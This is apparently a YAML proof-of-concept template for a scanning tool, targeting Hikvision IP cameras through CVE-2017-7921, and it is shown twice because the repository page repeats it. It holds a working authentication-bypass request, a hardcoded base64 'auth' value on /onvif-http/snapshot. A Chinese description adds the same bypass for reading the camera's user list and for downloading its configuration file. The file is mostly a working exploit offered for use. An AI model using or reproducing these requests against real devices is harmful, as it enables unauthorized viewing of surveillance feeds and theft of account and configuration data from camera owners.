poc2jar/poc/hikvision/CVE-2017-7921.yml

method: GET
url: $
tlsversion: HTTP/1.1
uri: /onvif-http/snapshot
param: auth=YWRtaW46MTEK
data: |

others:
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
    Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
condition:
    words: Content-Type:image/jpeg
    time:
expinformation:
    expname: hikvision
    expdescribe: hikvision/CVE-2017-7921.yml,返回的为查看的图像(访问该链接可以直接查看海康威视的监控截图/onvif-http/snapshot?auth=YWRtaW46MTEK;访问该链接可以直接查看海康威视的用户列表/Security/users?auth=YWRtaW46MTEK;访问该链接可以直接获取海康威视的配置文件/System/configurationFile?auth=YWRtaW46MTEK)
Add files via upload 首次上传 2021-07-03 12:13:34 +08:00			`method: GET`
			`url: $`
			`tlsversion: HTTP/1.1`
			`uri: /onvif-http/snapshot`
			`param: auth=YWRtaW46MTEK`
			`data: \|`

			`others:`
			`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0`
			`Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8'`
			`Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'`
			`Accept-Encoding: gzip, deflate`
			`Connection: keep-alive`
			`Upgrade-Insecure-Requests: 1`
			`condition:`
			`words: Content-Type:image/jpeg`
			`time:`
			`expinformation:`
			`expname: hikvision`
			`expdescribe: hikvision/CVE-2017-7921.yml,返回的为查看的图像(访问该链接可以直接查看海康威视的监控截图/onvif-http/snapshot?auth=YWRtaW46MTEK;访问该链接可以直接查看海康威视的用户列表/Security/users?auth=YWRtaW46MTEK;访问该链接可以直接获取海康威视的配置文件/System/configurationFile?auth=YWRtaW46MTEK)`